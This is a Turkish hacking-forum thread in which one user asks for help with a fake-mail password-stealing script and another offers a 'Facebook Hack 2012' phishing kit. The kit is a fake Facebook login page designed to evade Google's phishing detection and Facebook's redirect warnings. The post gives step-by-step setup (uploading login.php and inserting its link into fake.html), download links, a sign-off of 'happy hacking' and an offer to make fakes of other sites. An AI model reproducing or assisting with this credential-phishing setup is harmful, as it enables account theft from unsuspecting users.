Fake Mail hata

whitepoet

Yeni üye
14 Mar 2009
4
0
Arkadaşlar bu fake mailde ben ne hatası yapıyorum ne ettiysem denemelik yazdığım hiç bir şifre gelmedi.
siteden çalışıyor yorumları olan scriptlerden biri bu.

Oturum Aç
 

efare

Yeni üye
5 Eyl 2009
38
0
Facebook Hack 2012(ByLacost)

Her fake facebook login'in ortak sıkıntıları;
1)Linkin kendini ben fakeyim dermişcesine sırıtması.
2)Google amcanın phishing ispiyonculuğu.
3)Facebook'un "seni buraya yönlendiren.." diye başlayan ve beni gıcık eden uyarı sayfası.

İşte bütün bunlar benim kafamı karıştırdı ve çözüm aramaya başladım beklediğim ilham 4 saat sonra tuvaletteyken geldi ve bir çaba ile bunu uygulanabilir bir hale getirdim. Türkiye'de ve belkide dünyada ilk birşey yaptım. Biliyorum bunu çalanlar olucak onlara hakkım hiçbir zaman helal değildir. Aslında bunu internette paylaşmakta biraz tereddütlerim vardı ama en sonunda paylaştım. Sizden ricam beğendiyseniz teşekkür et butonuna basın :) . Evet diyeceklerim bu kadardı şimdi lafı daha uzatmadan ben anlatıma geçeyim.
TurkHackTeam | oneturkish

Demo: Giriş Yap | Facebook

Öncelikle Sistemden Birkaç Resimle Başlayalım.

TurkHackTeam | oneturkish


Ancak FBML malesef javascript, iframe ve css3 desteklemediği için yapmak zor ve baya zahmetli oldu benim açımdan çünkü php bilgim 0'dı.

Ve bir sorunum daha oldu FBML password inputunu kabul etmiyor ve göstermiyor o yüzden onun içinde farklı bir çözüm ürettim. Belki javascript kullanılabilseydi daha güzel birşey çıkardı ortaya...


Kurulumu oldukça basit;
1)Verdiğim dosyalardan "login.php" ile "***********oneturkish.html" yi hostta aynı dizine atıcaksınız.TurkHackTeam | oneturkish
2)Yine verdiğim dosyalardan "fake.html"yi not defteri ile açın ve ctrl+f ile "BURAYALİNK" kelimesini aratın.
3)Daha sonra "BURAYALİNK" yazısını silin ve hosta atmış olduğunuz "login.php"nin linkini oraya yapıştırın. Örneğin: "http://ornek.atspace.co.uk/login.php".
4)Daha sonra not defterinde açmış olduğumuz "fake.html" yi kopyalıyoruz ve sayfamızdaki FBML'nin içine yapıştırıp değişiklikleri kaydete basıyoruz.


Anlatım biraz karışık oldu ve kısa bi değindim videosu verdiğim linkte mevcut ayrıntılı bir şekilde anlattım videoda. Bedava host almayı anlatmıyorum herkes biliyodur bilmiyosanız bile google bugünler için var araştırırsınız :)

Ve şimdi gelelim linklere;

Facebook Hack 2012(oneturkish).rar
VirusTotal: [url]https://tik.lat/IEKpM

Turbobit: https://tik.lat/lDuj4 TurkHackTeam | oneturkish
RapidShare: https://tik.lat/I1lwe


Not: Alıntı yaparsanız ByLacost'den alıntı olduğunu belirtin. Herkese iyi hacklemeler. Umarım faydalı olmuştur.

Çalışmalarım devam edicek herhangi bir site fake isteği olursa ben ve anlatımlarım hep burdayız bunu bana bildirmeniz yeterl

Eger Yapamıyan olursa Hasan Yalçın | Facebook
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.